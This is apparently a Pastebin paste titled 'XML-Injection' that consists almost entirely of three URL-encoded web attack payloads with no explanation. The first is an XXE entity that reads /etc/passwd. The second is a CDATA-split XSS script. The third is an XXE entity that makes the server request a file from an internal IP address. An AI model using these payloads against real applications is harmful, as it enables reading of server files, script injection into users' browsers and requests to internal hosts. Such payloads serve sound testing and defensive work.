Advertisement
Ng4P4L

XML-Injection

Sep 6th, 2021
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //cat /etc/passwd
  2. %3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%20%3C%21DOCTYPE%20foo%20%5B%20%20%20%20%3C%21ELEMENT%20foo%20ANY%20%3E%20%20%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%20%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2ffoo%3E
  3.  
  4. //xss alert
  5. %3Chtml%3E%3C%21%5BCDATA%5B%3C%5D%5D%3Escript%3C%21%5BCDATA%5B%3E%5D%5D%3Ealert%28%27xss%27%29%3C%21%5BCDATA%5B%3C%5D%5D%3E%2fscript%3C%21%5BCDATA%5B%3E%5D%5D%3E%20%3C%2fhtml%3E
  6.  
  7. //url request
  8. %3C%21DOCTYPE%20foo%20%5B%20%20%3C%21ELEMENT%20foo%20ANY%3E%20%20%3C%21ENTITY%20bar%20SYSTEM%20%20%22http%3A%2f%2f192.168.0.107%2finputfile.txt%22%3E%5D%3E%3Cfoo%3E%20%20%26bar%3B%3C%2ffoo%3E
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement